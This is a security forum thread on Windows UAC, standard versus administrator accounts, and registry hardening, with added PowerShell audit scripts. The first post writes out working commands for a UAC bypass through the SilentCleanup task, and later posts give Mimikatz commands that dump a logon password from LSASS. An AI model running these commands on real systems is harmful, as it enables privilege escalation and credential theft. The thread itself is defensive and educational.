User Account like a Castle

Discussion in 'General Security Discussions' started by Andy Ful, Jul 17, 2017.

  1. Andy Ful

    Andy Ful Level 13

    Dec 23, 2014
    638
    2,302
    business
    Poland
    Windows 10
    Microsoft
    #1 Andy Ful, Jul 17, 2017
    Last edited by a moderator: Aug 24, 2017
    What is User Account with UAC? It is like a castle.
    Is the castle a security? It was in the medieval ages.
    What is Standard User Account (SUA) with UAC? It is a castle in the medieval ages.
    What is Administrator Account (AA) with UAC? What a stupid question. It is a castle in the 21st century!

    Why is AA with UAC not a security?
    1. Microsoft says that UAC is not a security, but only a security component.
    2. Microsoft tells the truth: AA with UAC can be easily bypassed in many ways.

    Remark.
    Microsoft officially says that UAC is not a security. I understand this official statement as a statement about default UAC usage, which is mostly AA with UAC.

    Example (works only in Windows 8.1+).
    Run command prompt on AA as standard user and copy/execute the below commands:
    reg add HKCU\Environment /v windir /d "cmd /K reg delete hkcu\Environment /v windir /f && REM" /f
    schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
    reg delete hkcu\Environment /v windir /f
    echo "Finished"

    You can see the second command prompt window, running as administrator without UAC prompt!
    You can repeat this on SUA, and you will see that the second command prompt will be run as standard user!

    Can you make UAC more secure on AA? Yes.
    1. You can choose 'Always notify' UAC setting.
    2. You can use hidden UAC setting to elevate only executables that are signed and validated:
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
    "ValidateAdminCodeSignatures"=dword:00000001

    But, even those secure settings will not prevent some UAC bypasses like from our Example.
    Those bypasses can be blocked when using some other methods like Software Restriction Policies, whitelisting, or blocking some system executables (see Excubits Bouncer blacklist). For example, blocking 'reg.exe' will stop the bypass from our Example.

    Let's come back to medieval ages.
    Why is SUA (with UAC as an integral security component) a security boundary?
    1. It is recommended by Microsoft.
    2. It is a security boundary from the administrator standpoint (the user does not know the administrator password).
    3. It is a security boundary when preventing malware infections. Over 80% of 0-day malware samples (including exploits) fail on SUA.

    Can you make SUA even more secure? Yes.
    You can use the same hardening settings as on AA, or disable elevation of privilege as a standard user, by the reg tweak:
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
    "ConsentPromptBehaviorUser"=dword:00000000 ---> no elevation on SUA
    "ConsentPromptBehaviorUser"=dword:00000001 ---> prompt for administrator credentials on SUA

    See also the excellent articles about user accounts & UAC:
    Tyranid's Lair: Reading Your Way Around UAC (Part 1)
    Tyranid's Lair: Reading Your Way Around UAC (Part 2)
    Tyranid's Lair: Reading Your Way Around UAC (Part 3)
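    The settings above can be checked from a script. The following PowerShell is an added example, not code from the original post: it reads the UAC policy values named in the post (EnableLUA, ConsentPromptBehaviorAdmin, PromptOnSecureDesktop, ValidateAdminCodeSignatures, ConsentPromptBehaviorUser), reports whether the 'Always notify' and signature-validation hardening is in place, and flags a 'windir' value in HKCU\Environment, since that per-user override is exactly what the Example plants and a clean profile normally has none. The default values used when a value is absent are the Windows 10 defaults.

```powershell
# Added example (not from the thread): report the UAC policy values discussed
# above and flag a per-user 'windir' override. Reading these keys needs no elevation.
$policy = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'

function Get-PolicyValue {
    param([string]$Name, [int]$Default)
    $item = Get-ItemProperty -Path $policy -Name $Name -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $Default }   # absent value: Windows applies its default
    return [int]$item.$Name
}

# Defaults are the Windows 10 values used when the value is not present in the key
$enableLua   = Get-PolicyValue 'EnableLUA'                   1
$adminPrompt = Get-PolicyValue 'ConsentPromptBehaviorAdmin'  5
$userPrompt  = Get-PolicyValue 'ConsentPromptBehaviorUser'   3
$secureDesk  = Get-PolicyValue 'PromptOnSecureDesktop'       1
$validateSig = Get-PolicyValue 'ValidateAdminCodeSignatures' 0

$adminPromptText = @{
    0 = 'elevate without prompting'
    1 = 'prompt for credentials (secure desktop)'
    2 = 'prompt for consent (secure desktop)'
    3 = 'prompt for credentials'
    4 = 'prompt for consent'
    5 = 'prompt for consent for non-Windows binaries (default)'
}[$adminPrompt]
$userPromptText = @{
    0 = 'automatically deny (no elevation on SUA)'
    1 = 'prompt for credentials (secure desktop)'
    3 = 'prompt for credentials (default)'
}[$userPrompt]

$findings = @()
if ($enableLua -ne 1) { $findings += 'UAC is disabled (EnableLUA=0)' }
# The 'Always notify' slider position is ConsentPromptBehaviorAdmin=2 with PromptOnSecureDesktop=1
if ($adminPrompt -ne 2 -or $secureDesk -ne 1) { $findings += "Admin prompt is not 'Always notify'" }
if ($validateSig -ne 1) { $findings += 'ValidateAdminCodeSignatures is not set to 1' }

# HKCU\Environment normally defines no 'windir'; the Example above plants one so that
# an auto-elevated task expands it instead of the machine-wide value.
$userEnv = Get-ItemProperty -Path 'HKCU:\Environment' -ErrorAction SilentlyContinue
if ($userEnv -and ($userEnv.PSObject.Properties.Name -contains 'windir')) {
    $findings += "HKCU\Environment\windir is defined: $($userEnv.windir)"
}

if ($findings.Count -gt 0) { $summary = $findings -join '; ' } else { $summary = 'none' }

[pscustomobject]@{
    EnableLUA            = $enableLua
    AdminPrompt          = "$adminPrompt = $adminPromptText"
    StandardUserPrompt   = "$userPrompt = $userPromptText"
    ValidateAdminCodeSig = $validateSig
    Findings             = $summary
}
```

    Run it under the account you want to assess; on a SUA the StandardUserPrompt line is the one that matters, on an AA the AdminPrompt and ValidateAdminCodeSig lines are. A 'windir' finding on a machine where nobody ran the Example by hand is worth investigating, because the value is only needed for the duration of the trick and is deleted again by the cleanup line.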
     
  2. Andy Ful

    #2 Andy Ful, Jul 17, 2017
    Last edited: Jul 17, 2017
    Something is wrong with my thread. I cannot post the full text because of an error. Please do not reply because 75% of text should be still added! The original text has some examples of commands, and this is probably the issue.

    Edit
    It is OK now. I had to add and next edit the commands in parts.
     
    AtlBo, askmark, Sunshine-boy and 3 others like this.
  3. Daniel Keller

    Thank you very much for this post. It is very educating, as usual! :)
     
    AtlBo, askmark, Sunshine-boy and 4 others like this.
  4. Andy Ful

    Thanks for reading it, and the kind comment.:)
    This thread may be controversial for some forum members.
     
    frogboy, AtlBo, askmark and 5 others like this.
  5. Windows_Security

  6. Andy Ful

    Yes, I know it, too.;)
     
    AtlBo, askmark, Solarlynx and 3 others like this.
  7. Andy Ful

    #7 Andy Ful, Aug 6, 2017
    Last edited: Aug 6, 2017
    I did not notice that I made a terrible mistake. :confused:
    The right registry values should be as follows:
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
    "ConsentPromptBehaviorUser"=dword:00000000 ---> no elevation on SUA
    "ConsentPromptBehaviorUser"=dword:00000001 ---> prompt for administrator credentials on SUA

    I have a question to the Malwaretips forum Staff: Can I edit my first post to avoid misguiding the readers?
     
    AtlBo, askmark, Solarlynx and 4 others like this.
  8. SHvFl

    Either annoy a few staff members this way @Umbra @Jack @BoraMurdar or report the post with what you want changed so they can do it when they check reports. I guess I did the annoying part, but you can do the report method also if you wish.

    Btw, if I use UAC hardening #2 that you mentioned with UAC at max level, will MS stuff auto-elevate like with UAC normal level, but without the security risk that comes with UAC default level?
     
    AtlBo, askmark, Solarlynx and 4 others like this.
  9. Andy Ful

    Thanks for the correction to the Malwaretips Staff.:)
     
    AtlBo, askmark, Solarlynx and 4 others like this.
  10. Andy Ful

    Thanks for the help.:)
    If you meant the below hardening:
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
    "ValidateAdminCodeSignatures"=dword:00000001
    then it is safe when considering the actual MS stuff used by the Windows system. But I noticed that older versions of Microsoft executables that are not digitally signed cannot be elevated with this hardening. For example, the actual wscript.exe can be elevated, but wscript.exe from an older version cannot.
     
  11. rockstarrocks

    Wow, you almost described the UAC & SUA in layman's terms. Nice 'Castle' analogy. Thanks for the good read.
     
    AtlBo, askmark, Solarlynx and 5 others like this.
  12. Andy Ful

    #12 Andy Ful, Aug 7, 2017
    Last edited: Aug 7, 2017
    The one important question should be asked, too.
    Is there a way to execute applications with an elevation on 'SUA with no elevation tweak'?
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
    "ConsentPromptBehaviorUser"=dword:00000000 ---> no elevation on SUA

    If the execution is performed directly from SUA, then maybe it is possible, but I do not know how. If someone knows, please post the solution here.
    Yet, there is a known way to bypass the no elevation tweak using programs that can log on as administrator. For example, one can execute runas (Microsoft command-line tool) from SUA, log on as administrator using administrator credentials, and run (from the Administrator Account) any application that requires elevation.
     
    AtlBo, askmark, Solarlynx and 2 others like this.
  13. Andy Ful

    One can harden the system, using additional credentials protection:
    ; Default value CachedLogonsCount = 10 must be changed to 0 (restart the system).
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
    "CachedLogonsCount"="0"
     
    AtlBo, TairikuOkami, askmark and 3 others like this.
  14. Andy Ful

    #14 Andy Ful, Aug 7, 2017
    Last edited: Aug 7, 2017
    The last question (maybe). How is it possible, that system scheduled tasks and Windows Updates can work, when the user is logged on 'no elevation SUA'?
    The answer is very simple. They do not use SUA at all. For example, many scheduled tasks use the Windows built-in 'NT AUTHORITY\SYSTEM' account. So, it is also possible for the user to create some scheduled tasks started as administrator. Those tasks may operate in the background (with administrative rights) when the user is logged on 'no elevation SUA'. Some applications (like Google Chrome) can use scheduled tasks to auto-update with higher rights, and this works too on 'no elevation SUA'.
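    Those background tasks are easy to enumerate. The following PowerShell is an added example, not code from the original post: it lists every scheduled task whose principal runs as SYSTEM, LOCAL SERVICE or NETWORK SERVICE, or that is configured to 'Run with highest privileges', together with the command each task executes, so the tasks that keep working with administrative rights while the user sits on a 'no elevation SUA' can be reviewed one by one. The cmdlet names are the standard ScheduledTasks module ones; which tasks are visible depends on the rights of the account running the script.

```powershell
# Added example (not from the thread): list scheduled tasks that run with
# administrative rights regardless of the logged-on user's account type.
# An unelevated session sees only the tasks it may read; run elevated for all.
$servicePrincipals = '^(SYSTEM|S-1-5-18|LOCAL SERVICE|NETWORK SERVICE)$'

Get-ScheduledTask |
    Where-Object {
        $_.Principal.RunLevel -eq 'Highest' -or
        $_.Principal.UserId -match $servicePrincipals
    } |
    ForEach-Object {
        # Exec actions carry Execute/Arguments; COM handler actions carry neither,
        # so those show up as an empty string rather than failing.
        $actions = $_.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)".Trim() }
        [pscustomobject]@{
            Task      = $_.TaskPath + $_.TaskName
            RunAs     = $_.Principal.UserId
            LogonType = $_.Principal.LogonType
            RunLevel  = $_.Principal.RunLevel
            State     = $_.State
            Actions   = ($actions -join '; ')
        }
    } |
    Sort-Object RunAs, Task |
    Format-Table -AutoSize -Wrap
```

    Tasks under \Microsoft\Windows\ running as SYSTEM are expected on every installation; the ones to look at are tasks outside that tree with RunLevel 'Highest' or a SYSTEM principal, since those are the user-created or third-party updater tasks the post describes, and anything a standard user can modify in their Actions column is worth checking. Windows Update itself runs as a service rather than a task and will not appear here.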
     
  15. Andy Ful

    Some words about the CachedLogonsCount=0 setting:
    1. It is related to passwords in Active Directory Domains (AD Domains).
    2. The computer with Windows Home can be connected to AD Domain, so it can use folders, files, applications, and printers located anywhere on the network.
    3. The computer with Windows Pro (Ultimate) can be joined to an AD Domain, so it can be centrally managed using Group Policies and Active Directory.

    In home networks, using the AD Domain is an unusual solution. The standard Home networks use HomeGroup to share files and printers.
     
  16. Andy Ful

    #16 Andy Ful, Aug 11, 2017
    Last edited: Aug 11, 2017
    Recently, I tested Mimikatz. This is a well known hack-tool, often used for password harvesting. It seems that most Mimikatz modules require administrative rights, so they will fail on SUA. One of those modules is Sekurlsa, which can extract passwords, keys, PIN codes and tickets from the memory of LSASS. There is a not well known hardening reg tweak for Windows 7 and Windows 8.0 that prevents the "clear-text" (reversibly encrypted plaintext) passwords from being placed in LSASS memory:
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest]
    "UseLogonCredential"=dword:00000000

    The above works only with hotfix KB2871997 (Microsoft Security Advisory 2871997).
    From Windows 8.1 this tweak is not necessary, because such "clear-text" passwords are not stored in memory. But, the simple registry modification: UseLogonCredential = 1, can be made by malware to force "clear-text" passwords to be stored in memory again (also in Windows 8.1 and Windows 10).
     
  17. Andy Ful

    Tested on Windows 8 32-bit in a virtual machine (one default admin account with password).
    Installed hotfix KB2871997. Mimikatz commands:
    privilege::debug
    sekurlsa::logonpasswords

    Without the reg tweak, Mimikatz showed my log-on password to the admin account under the wdigest position in the Mimikatz console. After applying the reg tweak and logging off/logging on, Mimikatz showed the last log-on session with a (null) admin password under the wdigest position, and the previous log-on session with a visible admin password. So, Windows stopped writing "clear-text" log-on passwords to memory, but did not clear the previous sessions from memory (system restart required).
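    The two credential-related tweaks in this thread (the WDigest UseLogonCredential value from posts #16 and #17 and CachedLogonsCount from post #13) can be audited and applied together. The following PowerShell is an added example, not code from the original posts; save it as a .ps1 and run it without parameters to report, or with -Fix in an elevated session to apply the hardened values. The Windows version check uses the real build number from Win32_OperatingSystem, because the meaning of an absent UseLogonCredential value differs between Windows 7/8.0 and Windows 8.1+, as the posts describe. The restart reminder mirrors the test above: the value stops new plaintext credentials from being cached but does not purge sessions already in LSASS memory.

```powershell
# Added example (not from the thread): audit or apply the WDigest and
# CachedLogonsCount hardening. Save as a .ps1; -Fix requires an elevated session.
param([switch]$Fix)

$wdigest  = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'
$winlogon = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'

function Get-RegValue {
    param([string]$Path, [string]$Name)
    $item = Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return $item.$Name
}

$osVersion    = [version](Get-CimInstance Win32_OperatingSystem).Version
$useLogonCred = Get-RegValue $wdigest 'UseLogonCredential'

# Absent value: plaintext caching is ON for Windows 7 / 8.0 (KB2871997 adds support
# for the value but does not set it) and OFF from Windows 8.1 (6.3) onwards.
# An explicit 1 re-enables caching on every version, so it is the state to alarm on.
if ($null -eq $useLogonCred) {
    if ($osVersion -ge [version]'6.3') { $wdigestState = 'off (value absent, 8.1+ default)' }
    else                               { $wdigestState = 'ON (value absent, pre-8.1 default)' }
} elseif ([int]$useLogonCred -eq 0) {
    $wdigestState = 'off (UseLogonCredential=0)'
} else {
    $wdigestState = "ON (UseLogonCredential=$useLogonCred)"
}

# CachedLogonsCount is stored as a string; Windows defaults to 10 when it is absent.
$cached = Get-RegValue $winlogon 'CachedLogonsCount'
if ($null -eq $cached) { $cachedCount = 10 } else { $cachedCount = [int]$cached }

if ($Fix) {
    if (-not (Test-Path $wdigest)) { New-Item -Path $wdigest | Out-Null }
    Set-ItemProperty -Path $wdigest  -Name 'UseLogonCredential' -Type DWord  -Value 0
    Set-ItemProperty -Path $winlogon -Name 'CachedLogonsCount'  -Type String -Value '0'
    Write-Warning 'Values applied. Restart to clear credentials that LSASS already holds.'
    $useLogonCred = 0; $cachedCount = 0
    $wdigestState = 'off (UseLogonCredential=0)'
}

[pscustomobject]@{
    OSVersion          = $osVersion.ToString()
    WDigestPlaintext   = $wdigestState
    CachedLogonsCount  = $cachedCount
    Hardened           = (($null -ne $useLogonCred) -and ([int]$useLogonCred -eq 0) -and ($cachedCount -eq 0))
}
```

    Two caveats on applying it. CachedLogonsCount=0 only matters on a domain-joined machine, and on one it means no domain user can log on while the domain controller is unreachable, which is why laptops are usually left at a small non-zero value. And because malware can simply write UseLogonCredential=1 back, as post #16 notes, the useful follow-up is to re-run the report periodically or alert on any change to that value rather than to set it once and forget it.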
     
    AtlBo, rockstarrocks and askmark like this.
  18. TairikuOkami

    #18 TairikuOkami, Aug 13, 2017
    Last edited: Aug 13, 2017
    I am just dropping in to say thank you for "ValidateAdminCodeSignatures" and the rest. ;)
    I did not like it at first, since many exe do not work, but I have found a way around it using bat.

    Code:
    reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "ValidateAdminCodeSignatures" /t REG_DWORD /d "0" /f
    start "" "E:\Software\Temp\Soft\Rapr.exe"
    start "" "E:\Software\Temp\Soft\UpdateTime.exe"
    reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "ValidateAdminCodeSignatures" /t REG_DWORD /d "1" /f
     
    AtlBo, rockstarrocks and Andy Ful like this.
  19. Andy Ful

    It is a good and practical solution.:)
    Yet, some things should be remembered:
    1. When one of the applications started in the batch hangs the system, it will restart with ValidateAdminCodeSignatures = 0.
    2. The user cannot block execution of 'reg.exe'.
    3. The ValidateAdminCodeSignatures setting is especially strong on SUA. When using the local Administrator Account, every UAC bypass will also bypass this setting, so additional security is welcome, for example default deny solution.
     
    AtlBo likes this.
  20. Andy Ful

    The first mention of this reg tweak I found in some of the @Windows_Security (or @Kees1958) posts on the Wilderssecurity forum, but it has a long history, going back to the year 2006:
    [MS-GPSB]: User Account Control
     
    AtlBo likes this.